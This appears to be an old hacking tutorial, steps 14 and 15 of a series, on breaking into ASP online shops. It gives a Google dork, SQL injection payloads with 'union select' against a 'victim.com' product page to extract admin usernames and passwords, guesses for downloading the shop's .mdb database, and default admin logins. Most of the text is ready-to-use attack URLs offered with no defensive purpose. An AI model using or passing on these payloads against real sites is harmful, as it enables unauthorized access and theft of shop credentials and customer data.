after dl the db look at access for user and password


14:
1/ search google: allinurl:"shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5


2/ find error by adding '
--->http://victim.com/shopdisplayproducts.asp?id=5'


--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467


-If you don't see error then change id to cat


--->http://victim.com/shopdisplayproducts.asp?cat=5'


3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password


--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password


--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......


4/ add 2,3,4,5,6.......until you see a nice table


add 2
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password


...5,6,7,8,9.... untill you see a table. (exp:...47)


---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
---->see a table.




5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password


--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password


6/ Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp




Didn't work? then u have to find yourself:


add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password


--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password




you'll see something like: ( lot of them)


shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............


then guess admin link by adding the above data untill you find admin links

15:
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx


the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb


download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com


inside you should be able to find *** information.
and you should even be able to find the admin username and password for the website.


the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp


if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are


Username: admin
password: admin
OR
Username: vpasp
password: vpasp

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More